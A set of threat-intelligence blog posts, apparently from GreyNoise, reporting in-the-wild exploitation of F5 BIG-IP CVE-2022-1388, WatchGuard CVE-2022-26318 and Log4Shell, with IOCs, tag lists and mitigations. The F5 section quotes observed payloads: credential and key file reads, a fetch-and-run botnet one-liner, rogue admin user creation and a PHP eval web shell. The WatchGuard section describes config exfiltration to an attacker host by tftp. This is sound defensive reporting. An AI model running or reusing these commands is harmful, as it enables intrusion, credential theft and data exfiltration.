Threat Signals

TL;DR 

• As of 14-May-22, GreyNoise has observed 173 unique IP addresses attempting to exploit the F5 BIG-IP iControl REST Authentication bypass vulnerability in the wild.
• GreyNoise Trends exploit activity observed in the wild for CVE-2022-1388
• Observed exploit techniques include a large number of file requests, credential stuffing, and admin user creation. 
• Download the latest list of IPs trying to exploit this vulnerability here for use in analysis and temporary blocking

Vulnerability Overview - CVE-2022-1388

On 4-May-22, F5 Networks issued Security Advisory K23605346: BIG-IP iControl REST vulnerability CVE-2022-1388, which allows an unauthenticated attacker to take control of an affected system. According to NIST’s National Vulnerability Database, CVE-2022-1388 carries a CVSS score of 9.8 CRITICAL out of 10.

"This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services," F5 said in an advisory. "There is no data plane exposure; this is a control plane issue only."

The F5 Security Advisory identifies which versions are affected, and the company has issued patches for the flaw, as well as recommended temporary workarounds until the fixes can be applied. 

As of May 8, 2022, a number of security researchers started sharing evidence of their successful exploitation attempts:

• https://twitter.com/BursaMatus/status/1523379163914137600
• https://twitter.com/ptswarm/status/1522873828896034816
• https://twitter.com/Horizon3Attack/status/1523634533400461312

Given the severity of the vulnerability and ease of exploitation, GreyNoise advises organizations to apply mitigations or patch immediately.

Observed In The Wild

GreyNoise Trends for F5 BIG-IP iControl REST Authentication Bypass:

• https://viz.greynoise.io/tag/f5-big-ip-icontrol-rest-authentication-bypass

As of 14-May-22, GreyNoise has observed 173 unique IP addresses attempting to exploit the F5 BIG-IP iControl REST Authentication bypass vulnerability, CVE-2022-1388. 

‍

Below are a set of observations from the GreyNoise Research team based on the mass exploitation activity for this CVE that we’ve captured via our passive global sensor network:

Scale of attacks

Although GreyNoise has seen a rising number of IP addresses using this attack, this is still a relatively low number when compared to the first week of the Apache Log4J Vulnerability CVE-2021-44228, which had up to 800 unique IPs in the first days of public proof of concept release. This is potentially because of the large number of devices with “F5 BigIP'' in their title on Shodan and the large percentage of those that could be honeypots. Some honeypots lack crucial characteristics that this attack relies on, such as a server associated with the vulnerability like Apache or Jetty, and therefore are worthless to the attacker. 

Source of attacks

• 30% of exploit traffic targeting F5 BigIP devices is coming through TOR, commonly used for source obfuscation.
• 52 out of 123 of the IPs in the initial survey of traffic were new IPs to GreyNoise sensors. This indicates actors may have utilized new infrastructure to deploy their exploit scripts.

Exploitation techniques

A large number of file requests - using ‘cat’ and then a filename allows the attacker to read the files they are requesting. They can use this information as reconnaissance for further attacks.

<pre><code>cat /root/.bash_history
cat /etc/hosts
cat /config/bigip.conf
cat /var/ssh/root/identity
cat /config/bigip_user.conf
cat /var/ssh/root/authorized_keys
cat /etc/shadow
cat /var/ssh/root/identity.pub</code></pre>

‍

A single f5 master key grab attempt (Source: https://support.f5.com/csp/article/K9420)

<pre><code>f5mku -K</code></pre>

‍

“Add to botnet” script - a small script starts by using ‘<span class="code-block" fs-test-element="rich-text">unset histfile</span>’ commands to stop the command history from being saved to the box. The script then reaches out to an external IP to get a file called “<span class="code-block" fs-test-element="rich-text">sitemap1.jpg</span>”, and then rules that file as a perl script. That perl script adds the machine to an IRC-based botnet.

<pre><code>unset HISTFILE;unset HISTSAVE;wget http://[x.x.x.x]/sitemap1.jpg;fetch http://[x.x.x.x]/sitemap1.jpg;curl -O http://[x.x.x.x]/sitemap1.jpg;perl sitemap1.jpg;rm -rf sitemap*\</code></pre>

‍

‍Credential stuffing - we’ve seen an interesting approach to credential stuffing used - a base64 encoded login string which decodes to admin:horizon 3. @Horizon3Attack is the name of the group which first released their PoC for this exploit.

• Connection: X-F5-Auth-Token Host: 127.0.0.1 Authorization: Basic YWRtaW46aG9yaXpvbjM= X-F5-Auth-Token: asdf 

Exploit failures - we’re seeing some things that just don’t work. 

• X-F5-Auth-Tokens set to values that won’t work - the most prominent of which taking the literal advice of “set the X-F5-Auth-Token to anything”.

User creation - the user created results in an admin role with a bash shell, giving the attacker potential command line access if the command actually creates the user.

<pre><code>tmsh show running-config /auth user; tmsh create auth user syscron password MfWmK86skPwXiTG partition-access add { all-partitions { role admin } } shell bash'</code></pre>

‍

‍Potential php eval script injection - a small script that edits the imgTui.php script internal to the F5. This technique is a potential php eval script injection. 

<pre><code>mount -o remount -rw /usr;echo PD9waHAgQGV2YWwoJF9SRVFVRVNUWydUN01IeXJkM0w2J10pOw== | base64 --decode > /usr/local/www/xui/common/images/imgTui.php;mount -o remount -r /usr</code></pre>

• The base64 decodes to <?php @eval($_REQUEST['T7MHyrd3L6']);

Indicators of Compromise

GreyNoise Trends for F5 BIG-IP iControl REST Authentication Bypass provides a downloadable list of all the IP addresses observed attempting to mass exploit CVE-2022-1388 in the past 24 hours.

Mitigation Actions

Patch

‍F5 has recommended installing patched versions of F5 BIG-IP that are known to be vulnerable.

Mitigation prior to patching

‍Until you can install the patched version of BIG-IP, there are several temporary mitigations you can apply:

• Block iControl REST access - F5-recommended mitigations include blocking iControl REST access through the self IP address and the management interface
• Modify BIG=IP httpd configuration - F5-recommended mitigation
• Block mass exploit IP addresses - GreyNoise identifies a list of IP addresses attempting to exploit this BIG-IP vulnerability in the past 24 hours that you can block temporarily until you have had time to install the patched version of BIG-IP. The IP addresses can be downloaded from GreyNoise Trends for F5 BIG-IP iControl REST Authentication Bypass in several formats, including JSON, CSV, TXT files, as well as dynamically updated URLs for use with Palo Alto Networks, Cisco, and Fortinet firewalls.

Additional Information

• 4-May-22 F5 Warns of a New Critical BIG-IP Remote Code Execution Vulnerability, The Hacker News
• 8-May-22 Researchers Develop RCE Exploit for the Latest F5 BIG-IP Vulnerability, The Hacker News
• 10-May-22 Critical F5 BIG-IP vulnerability exploited to wipe devices, Bleeping Computer
• 12-May-22 Active Exploitation of F5 BIG-IP Devices (CVE-2022-1388), Security Boulevard

GreyNoise has observed malicious activity targeting WatchGuard CVE-2022-26318

UPDATE 28-Mar-22: A new PoC was released today for CVE-2022-26318 on WatchGuard Firebox and XTM appliances. Here are a couple of links to watch for new activity:

• GreyNoise Search - WatchGuard RCE Attempt
• GreyNoise Tags - WatchGuard RCE Attempt

Somebody has dropped the exploit for the pre-auth RCE (CVE-2022-26318) on WatchGuard Firebox and XTM appliances.

PoC: (NA) @GreyNoiseIO observed wild exploitation activity already.

Further analysis on https://t.co/xZSSvvSNxB (Yassine Aboukir 🐐 , @Yassineaboukir, March 28, 2022

---

As of February 27th, GreyNoise identified exploit activity targeting WatchGuard Firebox and XTM appliances. The logs of the associated traffic were shared with WatchGuard, who confirmed it was related to CVE-2022-26318. This vulnerability was published by NVD on March 3rd and was last modified on March 15th.

CVE-2022-26318 - On WatchGuard Firebox and XTM appliances, an unauthenticated user can execute arbitrary code, aka FBX-22786. This vulnerability impacts Fireware OS before 12.7.2_U2, 12.x before 12.1.3_U8, and 12.2.x through 12.5.x before 12.5.9_U2.

There is currently no publicly available proof-of-concept for this vulnerability, and we have reason to believe that this is currently being exploited by a sophisticated actor.

Find our GreyNoise tag to track and monitor this activity: GreyNoise Search | GreyNoise Tags.

Diagnose, Remediate, Prevent, Investigate

WatchGuard has published a software patch for CVE-2022-26318 and included it in the same software update that addressed Cyclops Blink. The FBI, CISA, DOJ, and UK NCSC worked closely with WatchGuard to develop the remediation plan for Cyclops Blink, which can be found at https://detection.watchguard.com/. These steps objectively address both Cyclops Blink and CVE-2022-26318 by updating the Fireware OS to the newest version. It is strongly advised that the steps as outlined be followed in their entirety.

If you are exclusively addressing CVE-2022-26318 as part of network security operations, the relevant Fireware release notes and documentation on Firebox remote management best practices are linked below:

• Fireware Release Notes
• Firebox Remote Management Best Practices

Indicators of Compromise (IOCs) & Detection

The following IOCs are provided to aid network security operations teams who may be unable to patch due to extraneous factors (such as those living with strict SLAs). Some artifacts of the observed payloads are described in an intentionally vague manner to prevent usage in offensive exploitation. As of this writing (March 17, 2022), no publicly available Proof-Of-Concept exploitation code is known to exist.

Observed CVE-2022-26318 payloads connect using a TLS wrapped TCP socket with a destination port of 4117, a port used for the management interface of WatchGuard products. An HTTP request is sent over the TLS connection.

Start Line

POST /agent/login HTTP/1.1

The URL path used for authentication for the WatchGuard management interface

Headers

Host: <victim_ip>:4117

This port is used for the WatchGuard management interface.

Content-Encoding: gzip

The body of the POST request is compressed with gzip

Content-Length: 673

Observed gzip compressed HTTP body payloads have a Content-Length of greater than 600 bytes.

For comparison, a well-formed benign authentication attempt to this HTTP path measures at just ~450 bytes prior to compression.

Body

The body of observed payloads are sent gzip compressed. Example payload compression attributes:

It is unclear at this time whether a gzip compressed payload body is necessary for exploitation.

Gzip

The contents of the gzip compressed payload contain a stream of data (named in order of appearance):

• Large, malformed XML
• A byte sequence that does not fall within the ASCII text range
• Python code that is executed using /usr/bin/python /tmp/test.py

Python Code

This python code does the following:

• Imports a cryptography library Fernet
• Defines a Base64 encoded key uVrZfUGeecCBHhFmn1Zu6ctIQTwkFiW4LGCmVcd6Yrk=
• Reads the WatchGuard config file /etc/wg/config.xml into a buffer
• Encrypts the buffer using the Base64 encoded key
• Writes the encrypted buffer to a file /tmp/enc_config.xml
• Executes a system command tftp -p -l /tmp/enc_config.xml -r <victim_ip>.bin 50[.]7.210.114

• This command uses the Trivial File Transfer Protocol client to upload the encrypted file to an attacker-controlled server

• Deletes the local copy of the encrypted config /tmp/enc_config.xml

Additional Notes

• If an HTTP body is gzip compressed, the last 4 bytes of the body may be cast as a Little Endian Unsigned Int32 value to get the uncompressed size of the gzip stream without needing to actually decompress the stream.
• The Base64 Encoded key used in the python code (uVrZfUGeecCBHhFmn1Zu6ctIQTwkFiW4LGCmVcd6Yrk=) was observed across multiple payloads.
• One of the IPs attempting to exploit CVE-2022-26318 62[.]171.145.102 serves a branded login page:

‍

• One of the IPs used for exfiltrating the encrypted WatchGuard config 50[.]7.210.114 has the following DNS records pointing to it:

• stream[.]gtf[.]club
• stream[.]radioneformat[.]ru

Please check out GreyNoise Search | GreyNoise Tags to track the latest activity for this vulnerability, and check back on this blog for periodic updates (we’ll add new information to the top of the page).

While you will be able to find a comprehensive list of all the tags created since our last round up below, the GreyNoise Research team wanted to highlight some interesting tags.

Apache Log4j RCE Attempt [Intention: Malicious]

Self Explanatory.

Backdoor Connection Attempt via WinDivert [Intention: Malicious]

This tag was created this week as a result of the research done by the Avast team.

DNS Over HTTPS Scanner [Intention: Unknown]

Relatively new technology. It's interesting because “why would you scan the internet for that?” and there's no clear motive - that we can tell.

Microsoft HTTP.sys RCE Attempt [Intention: Malicious]

Critical vulnerability in MS Windows’ http.sys kernel module.

VMware vCenter SSRF Attempt [Intention: Malicious]

Widely popular server management software.

Zoho ManageEngine ServiceDesk Plus msiexec RCE Attempt [Intention: Malicious]

A critical vulnerability in a popular help desk platform.

It has been a while since we last published a Tag Round Up! If these are helpful to you, or you have suggestions on what you would like to see, please reach out to community@greynoise.io

Antiwork Port 9100 Print Request [Intention: Unknown]

This IP address has been observed sending distinct RAW TCP/IP requests to network printers. References:

• https://en.wikipedia.org/wiki/JetDirect#Protocols
• https://web.archive.org/web/20211130181319/https://i.redd.it/d6v5i21cmr281.jpg

See it on GreyNoise Viz

Backdoor Connection Attempt via WinDivert [Intention: Malicious]

This IP address has been observed attempting to send a known activation secret "CB5766F7436E22509381CA605B98685C8966F16B" for a malicious backdoor utilizing WinDivert. References:

• https://decoded.avast.io/threatintel/avast-finds-backdoor-on-us-government-commission-network/
• https://github.com/avast/ioc/blob/master/usgov-backdoor/rce_example/run_calculator_on_infected.py

See it on GreyNoise Viz

DNS Over HTTPS Scanner [Intention: Unknown]

This IP address has been observed attempting to scan for responses to DNS over HTTPS (DoH) requests. References:

• https://datatracker.ietf.org/doc/html/rfc8484
• https://en.wikipedia.org/wiki/DNS_over_HTTPS

See it on GreyNoise Viz

Generic Unix Reverse Shell Attempt [Intention: Malicious]

This IP address has been observed attempting to spawn a generic Unix reverse shell via the web request. References:

• https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#bash-tcp

See it on GreyNoise Viz

iKettle Crawler [Intention: Unknown]

This IP address has been observed crawling the Internet and attempting to discover iKettle devices. References:

• https://awe.com/mark/blog/20140223.html
• https://asecuritysite.com/subjects/chapter54

See it on GreyNoise Viz

InfluxDB Crawler [Intention: Unknown]

This IP address has been observed crawling the Internet and attempting to discover InfluxDB instances. References:

• https://archive.docs.influxdata.com/influxdb/v0.9/query_language/query_syntax/#http

See it on GreyNoise Viz

IRC Crawler [Intention: Unknown]

This IP address has been observed sending NICK and USER commands used to register a connection with an IRC server. References:

• https://datatracker.ietf.org/doc/html/rfc2812#section-3.1

See it on GreyNoise Viz

iSCSI Crawler [Intention: Unknown]

This IP address has been observed crawling the Internet and attempting to discover hosts that respond to iSCSI login requests. References:

• https://www.rfc-editor.org/rfc/rfc7143.html#section-11.2
• https://book.hacktricks.xyz/pentesting/3260-pentesting-iscsi

See it on GreyNoise Viz

Jira REST API Crawler [Intention: Unknown]

This IP address has been observed attempting to enumerate Jira instances. References:

• https://developer.atlassian.com/cloud/jira/platform/rest/v3/api-group-server-info/

See it on GreyNoise Viz

Apache Druid RCE Attempt [Intention: Malicious]

CVE-2021-25646

This IP address has been observed attempting to exploit CVE-2021-25646, a remote command execution in Apache Druid v0.20.0 and earlier References:

• https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25646
• https://www.zerodayinitiative.com/blog/2021/3/25/cve-2021-25646-getting-code-execution-on-apache-druid
• https://blogs.juniper.net/en-us/threat-research/cve-2021-25646-apache-druid-embedded-javascript-remote-code-execution

See it on GreyNoise Viz

Apache Log4j RCE Attempt [Intention: Malicious]

CVE-2021-44228 | CVE-2021-45046

This IP address has been observed attempting to exploit CVE-2021-44228 and CVE-2021-45046, a remote code execution vulnerability in the popular Java logging library Apache Log4j. CVE-2021-44228 affects versions 2.14.1 and earlier, CVE-2021-45046 affects versions 2.15.0 and earlier. References:

• https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
• https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046
• ‍https://github.com/apache/logging-log4j2/pull/608

See it on GreyNoise Viz

CentOS Web Panel RCE Attempt [Intention: Malicious]

This IP address has been observed attempting to exploit a vulnerability in CentOS Web Panel, which can lead to elevated privileges and remote code execution. References:

• https://octagon.net/blog/2022/01/22/cve-2021-45467-cwp-centos-web-panel-preauth-rce/
• https://portswigger.net/daily-swig/rce-bug-chain-patched-in-centos-web-panel

See it on GreyNoise Viz

FHEM LFI [Intention: Malicious]

CVE-2020-19360

This IP address has been observed attempting to exploit CVE-2020-19360, a local file inclusion vulnerability in FHEM perl server. References:

• https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-19360
• https://github.com/EmreOvunc/FHEM-6.0-Local-File-Inclusion-LFI-Vulnerability/blob/master/README.md

See it on GreyNoise Viz

GLPI SQL Injection Attempt [Intention: Malicious]

CVE-2019-10232

This IP address has been observed attempting to exploit CVE-2019-10232, an SQL injection vulnerability in GLPI service management software. References:

• https://nvd.nist.gov/vuln/detail/CVE-2019-10232
• https://www.synacktiv.com/ressources/advisories/GLPI_9.3.3_SQL_Injection.pdf
• https://github.com/glpi-project/glpi/commit/684d4fc423652ec7dde21cac4d41c2df53f56b3c

See it on GreyNoise Viz

Grafana Path Traversal Attempt [Intention: Malicious]

CVE-2021-43798

This IP address has been observed attempting to exploit CVE-2021-43798, a path traversal and arbitrary file read in Grafana. References:

• https://nvd.nist.gov/vuln/detail/CVE-2021-43798
• https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p
• https://therecord.media/grafana-releases-security-patch-after-exploit-for-severe-bug-goes-public/

See it on GreyNoise Viz

Grafana Path Traversal Check [Intention: Unknown]

CVE-2021-43798

This IP address has been observed attempting to check for the presence of CVE-2021-43798, a path traversal and arbitrary file read in Grafana. References:

• https://nvd.nist.gov/vuln/detail/CVE-2021-43798
• https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p
• https://therecord.media/grafana-releases-security-patch-after-exploit-for-severe-bug-goes-public/

See it on GreyNoise Viz

HRsale LFI [Intention: Malicious]

CVE-2020-27993

This IP address has been observed attempting to exploit CVE-2020-27993, a local file inclusion vulnerability in HRsale. References:

• https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27993
• https://www.exploit-db.com/exploits/48920

See it on GreyNoise Viz

Metabase LFI Attempt [Intention: Malicious]

CVE-2021-41277

This IP address has been observed attempting to exploit CVE-2021-41277, a local file inclusion vulnerability in Metabase. References:

• https://github.com/metabase/metabase/security/advisories/GHSA-w73v-6p7p-fpfr
• https://nvd.nist.gov/vuln/detail/CVE-2021-41277
• https://twitter.com/90security/status/1461923313819832324

See it on GreyNoise Viz

Microsoft HTTP.sys RCE Attempt [Intention: Malicious]

CVE-2021-31166

This IP address has been observed attempting to exploit CVE-2021-31166, a remote code execution vulnerability in the Windows HTTP protocol stack. References:

• https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-31166
• https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2021-31166-rce-in-microsoft-httpsys/
• https://www.zerodayinitiative.com/blog/2021/5/17/cve-2021-31166-a-wormable-code-execution-bug-in-httpsys

See it on GreyNoise Viz

Motorola Baby Monitor RCE Attempt [Intention: Malicious]

CVE-2021-3577

This IP address has been observed attempting to exploit CVE-2021-3577, a remote command execution vulnerability in Motorola Halo+ baby monitors. References:

• https://randywestergren.com/unauthenticated-remote-code-execution-in-motorola-baby-monitors/
• https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3577

See it on GreyNoise Viz

NodeBB API Token Bypass Attempt [Intention: Malicious]

CVE-2021-43786

This IP address has been observed attempting to exploit CVE-2021-43786, an unintentionally allowed master token access which can lead to remote code execution. References:

• https://nvd.nist.gov/vuln/detail/CVE-2021-43786
• https://blog.sonarsource.com/nodebb-remote-code-execution-with-one-shot
• https://portswigger.net/daily-swig/critical-vulnerabilities-in-open-source-forum-software-nodebb-could-lead-to-rce

See it on GreyNoise Viz

October CMS Password Reset Scanner [Intention: Malicious]

CVE-2021-32648

This IP address has been observed attempting to exploit CVE-2021-32648, a password reset vulnerability in October CMS. References:

• https://nvd.nist.gov/vuln/detail/CVE-2021-32648
• https://github.com/Immersive-Labs-Sec/CVE-2021-32648/blob/main/cve-2021-32648.py

See it on GreyNoise Viz

TP-Link TL-WR840N RCE Attempt [Intention: Malicious]

CVE-2021-41653

This IP address has been observed attempting to exploit CVE-2021-41653, a remote command execution vulnerability in TP-Link TL-WR840N EU v5. References:

• https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41653
• https://securityforeveryone.com/tools/tp-link-os-command-injection-cve-2021-41653
• https://github.com/ohnonoyesyes/CVE-2021-41653

See it on GreyNoise Viz

VMware vCenter Arbitrary File Read Attempt [Intention: Malicious]

CVE-2021-21980

This IP address has been observed attempting to exploit CVE-2021-21980, an unauthorized arbitrary file read vulnerability in vSphere Web Client. References:

• https://www.vmware.com/security/advisories/VMSA-2021-0027.html
• https://nvd.nist.gov/vuln/detail/CVE-2021-21980
• https://github.com/l0ggg/VMware_vCenter

See it on GreyNoise Viz

VMware vCenter SSRF Attempt [Intention: Malicious]

CVE-2021-22049

This IP address has been observed attempting to exploit CVE-2021-22049, a server-side request forgery vulnerability in vSphere Web Client. References:

• https://www.vmware.com/security/advisories/VMSA-2021-0027.html
• https://nvd.nist.gov/vuln/detail/CVE-2021-22049
• https://github.com/l0ggg/VMware_vCenter

See it on GreyNoise Viz

WebSVN 2.6.0 RCE CVE-2021-32305 [Intention: Malicious]

CVE-2021-32305

This IP address has been observed scanning the Internet for devices vulnerable to CVE-2021-32305, a remote code execution vulnerability in WebSVN which utilizes a shell metacharacter in the search parameter. References:

• https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32305
• https://packetstormsecurity.com/files/163225/Websvn-2.6.0-Remote-Code-Execution.html

See it on GreyNoise Viz

Zimbra Collaboration Suite XXE Attempt [Intention: Malicious]

CVE-2019-9670

This IP address has been observed attempting to exploit CVE-2019-9670, an XXE vulnerability in Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10. References:

• https://www.exploit-db.com/exploits/46693/
• https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories
• https://bugzilla.zimbra.com/show_bug.cgi?id=109129
• http://www.rapid7.com/db/modules/exploit/linux/http/zimbra_xxe_rce
• http://packetstormsecurity.com/files/152487/Zimbra-Collaboration-Autodiscover-Servlet-XXE-ProxyServlet-SSRF.html
• https://isc.sans.edu/forums/diary/CVE20199670+Zimbra+Collaboration+Suite+XXE+vulnerability/27570/

See it on GreyNoise Viz

Zoho ManageEngine ServiceDesk Plus msiexec RCE Attempt [Intention: Malicious]

CVE-2021-44077

This IP address has been observed attempting to exploit CVE-2021-44077, a remote command execution vulnerability in Zoho ManageEngine ServiceDesk Plus before 11306, ServiceDesk Plus MSP before 10530, and SupportCenter Plus before 11014. References:

• https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44077
• https://attackerkb.com/topics/qv2aD8YfMN/cve-2021-44077/rapid7-analysis
• https://www.cisa.gov/uscert/ncas/current-activity/2021/12/02/cisa-and-fbi-release-alert-active-exploitation-cve-2021-44077-zoho

See it on GreyNoise Viz

Over the past month, security teams have been scrambling to deal with the fallout from the Log4Shell vulnerability (CVE-2021-44228) announced in early December. Between blocking exploitation attempts and trying to determine vulnerable assets, it had already been a long winter for defenders. This vulnerability is particularly challenging as the Apache Log4j library has been used within so many different applications worldwide that it created an unusually large surface area for security teams to identify and defend. Now that the initial shock of the vulnerability is over, we wanted to answer some questions received during the exploit surge and identify a few preventative strategies that might help during future outbreaks.

What does scanning for Log4J look like now?

As of January 2022, a month after initial CVE announcement, GreyNoise still observes a significant volume of traffic related to the Log4j vulnerability. This traffic is primarily composed of generic JNDI string exploit attempts with known obfuscations.

One of the interesting patterns we saw during the first few days of the Log4j “scan-and-exploit” outbreak was a huge surge in benign actors scanning for the vulnerability. The chart above shows Log4j-related activity broken down by scanners who provided attribution (generally benign scanning done by security firms, researchers, and academics) compared to non-attributed scanning (generally, malicious scanning by threat actors).

A huge part of the surge in scanning activity during the first days of the outbreak can be attributed to benign actors. Within the security community, there is significant discussion about the appropriateness of this scanning volume, as security teams further struggled with the alert volumes generated by this traffic during an emergent situation. It’s controversial enough that some in the security community are advocating blocking these types of scans.

Should I block the IPs that are scanning?

That depends. GreyNoise tracks internet noise caused by IPs scanning the entire internet, and classifies them as malicious, unknown, or benign based on their behavior and identity. For example, security vendors that scan the internet to identify vulnerable systems who voluntarily provide self-attribution are generally classified as benign. Other IP addresses that do opportunistic or unsolicited scanning, vuln checking, or exploitation are generally classified as malicious.

Note that organizations are not obligated to allow scanning of their network perimeter, regardless of GreyNoise classification. The value added by allowing or not blocking any IP seen by GreyNoise will vary depending on an organization’s threat model and security posture. The intended purpose of most benign traffic observed by GreyNoise is often to provide context, awareness, and added value to the IT and InfoSec community. However, any significant volume of unsolicited traffic, even that classified as benign by GreyNoise, may result in SOC alert fatigue and dangerous distraction during an active attack.

Does the GreyNoise tag capture the newest versions/latest associated vulnerabilities?

Mostly. The GreyNoise Log4J tag utilizes the presence of a JNDI format string within a packet’s body to tag IPs. The tag focuses on the core cause of the Log4j vulnerability, common to all the CVEs related to Log4j (CVE-2021-44228, CVE-2021-45046, CVE-2021-45105, CVE-2021-44832). As a result, the GreyNoise tag has no false positives and provides substantial coverage for relevant CVEs.

However, GreyNoise researchers have observed at least two examples of attempted Log4j exploits where the malicious string was base64 encoded in an application-specific parameter, allowing it to circumvent the GreyNoise tag.

See the following for more details: https://gist.github.com/nathanqthai/197b6084a05690fdebf96ed34ae84305#base64-encoded-into-parameter

Can I get payload data? Pcap?

Not usually. GreyNoise does not currently provide raw sensor data for operational security purposes, although we may do so in the future. The GreyNoise Visualizer and APIs do expose select User-agents and URI paths.

That said, due to the high variance of payloads observed at the peak of Log4j activity in December 2021, GreyNoise researchers elected to curate and publish a unified list of payload examples:

https://gist.github.com/nathanqthai/197b6084a05690fdebf96ed34ae84305#base64-encoded-into-parameter

What’s next?

Application-specific attacks leveraging Log4j vulnerabilities. This Apache Log4j vulnerability has been extremely challenging due to the ubiquity of the logging library's use. CVE-2021-44228 had an enormous impact and drew significant attention to how the Log4j library was used within applications worldwide. This attention resulted in several follow-on CVEs that bypassed the initial patch and used varied attack vectors (CVE-2021-45046, CVE-2021-45105, CVE-2021-44832). Log4j-related exploit activity may evolve as security researchers continue to scrutinize the library and its usage across various applications. For example, application-specific vulnerabilities like those discovered in H2 Database Console and VMware may become more prevalent. (https://portswigger.net/daily-swig/researchers-discover-log4j-like-flaw-in-h2-database-console, https://www.vmware.com/security/advisories/VMSA-2021-0028.html) At this time, GreyNoise has not observed any notable trends or upticks regarding application-specific Log4j payloads.

There are more servers on the internet than there is IPv4 space to assign each of these servers a unique address. In the case of the HTTP protocol, hundreds of servers may share a singular IP address and only be reachable when a specific host header is set as part of the connection request. Scoping out this much larger section of the internet in relation to Log4j is a non-trivial task that remains to be fully explored. It is also one of the reasons the cyber defense search engine “Onyphe” opted against scanning the entire internet for vulnerabilities related to Log4j and instead opted for a more targeted approach.

Stay tuned to GreyNoise to help identify exploit outbreaks

While things are not as bad as they were in December 2021, we do not envision Log4j scanners and attackers disappearing anytime soon. At GreyNoise, our goal is to help identify these kinds of outbreaks as fast as we possibly can in order to give security teams the time and breathing space they need to get their defenses in place.

You are always welcome to use the GreyNoise product to help you separate internet noise from threats as an unauthenticated user on our site. For additional functionality and IP search capacity, create your own GreyNoise Community (free) account today.

Exploit activity for Apache Log4j vulnerability - CVE-2021-44228

UPDATE 16-Dec-21, 4:00 PM ET: Tentative results for #Log4Shell activity by hour showing "Researcher" and "Non-Researcher" breakdown as observed by GreyNoise. It may not be 100% accurate, but it should give an idea of what we are observing. "Researcher" is defined by IPs that GreyNoise knows to be attributable scanners for commercial or research purposes, usually listed as "benign" in our data. "Non-Researcher" is defined as everything else. The researcher numbers seem to flatline, but we believe this is due to the scale of the plot, and new infrastructure spun up by various researchers that have not yet been accounted for. We will try to update this later for a better retroactive understanding.

UPDATE 16-Dec-21, 1:00 PM ET: GreyNoise Research has compiled a set of sample Log4Shell (CVE-2021-44228) payloads observed in the wild. These samples are intended to provide individuals with a clearer idea of some of the variation we're seeing, including esoteric protocols such as IIOP. https://gist.github.com/nathanqthai/197b6084a05690fdebf96ed34ae84305

UPDATE 15-Dec-21, 11:00 PM ET: As of 15-Dec-21, GreyNoise Research is seeing a decrease in the number of unique IP addresses scanning for the Apache Log4j vulnerability.

On December 5, 2021, Apache identified a vulnerability (later identified as CVE-2021-44228) in their widely used Log4j logging service. The vulnerability, also known as Log4shell, enables attackers to gain full control of affected servers by allowing unauthenticated remote code execution if the user is running an application utilizing the Java logging library. Log4j is heavily integrated into a broad set of DevOps frameworks, enterprise IT systems, and vendor software and cloud products.

GreyNoise first observed activity for this vulnerability on December 9, 2021, from 194.48.199[.]78 and 181.214.39[.]2.

To get a current list of all the IP addresses opportunistically scanning the internet to vuln check or exploit CVE-2021-44228, check out this tag summary in the GreyNoise Visualizer

“The reason this vulnerability matters is that Log4j is heavily integrated in enterprise IT and devops. There are a whole bunch of devops frameworks and a whole bunch of enterprise IT systems and vendor systems that use it. So if you pick basically any large vendor and stick Log4j in Google, you’ll find it kicking around in different products, which is going to become a problem. There’s clearly lots of systems out there that, in some way shape or form, rely on this.” – Kevin Beaumont (@GossiTheDog, via Twitter Spaces recording)

Timeline of CVE-2021-44228

On December 5th, 2021, Apache filed a JIRA issue identifying the vulnerability that would become CVE-2021-44228. The following day, December 6th, Apache released a patch providing some details on the vulnerability and crediting Chen Zhaojun of Alibaba Cloud Security Team for the discovery.

On December 9th, weaponized proof-of-concept exploits (PoCs) began to appear, leading to a rapid increase of scanning and public exploitation on December 10th.

Between 1200 EST and 1400 EST on December 10, 2021, GreyNoise has observed a 5x increase in the number of hits per sensor related to the Log4shell event.

Impact of CVE-2021-44228

Due to ease of exploitation and prevalence of Log4J, GreyNoise researchers believe that this activity will continue to increase over the next few days. A wide variety of use cases for this exploit have already begun to appear, ranging from exploiting Minecraft servers

to more high-profile issues potentially affecting Apple iCloud

‍

‍

The vulnerability feels similar to ShellShock, a vulnerability GreyNoise still observes since it was first identified in 2014.

Indicator of Compromise (IoC) resources for security teams

GreyNoise is providing IOCs for CVE-2021-44228 Apache Log4j RCE attempts on Github. You can access the C2/Callback domains here and the latest IPs here. You can get the most up-to-date information via GreyNoise for Log4shell here.

CVE-2021-44228 is still new, and its impact will likely be felt for a long time due to the pervasiveness of Log4j. Multiple recommendations for patching have been made (CISA), and detections have been made available. As the landscape develops, GreyNoise will be tweeting about new information and IoCs. Follow us there for the latest information.

‍

New Tags

GitLab CE RCE Attempt  [Intention: Malicious]

• CVE-2021-22205
• This IP address has been observed attempting to exploit CVE-2021-22205, a remote command execution vulnerability in GitLab Community Edition.
• Sources: NIST, HN Security, GitHub
• See it on GreyNoise Viz

Apache Storm Supervisor RCE Attempt  [Intention: Malicious]

• CVE-2021-40865
• This IP address has been observed attempting to exploit CVE-2021-40865, a pre-auth remote code execution vulnerability in Apache Storm supervisor server.
• Sources: Security Lab, SecLists
• See it on GreyNoise Viz

Hikvision IP Camera RCE Attempt  [Intention: Malicious]

• CVE-2021-36260
• This IP address has been observed attempting to exploit CVE-2021-36260, a remote command execution vulnerability in Hikvision IP cameras and NVR firmware.
• Sources: Watchful IP, Github (@Aiminsun)
• See it on GreyNoise Viz

SonicWall SMA100 Factory Reset Attempt  [Intention: Malicious]

• CVE-2021-20034
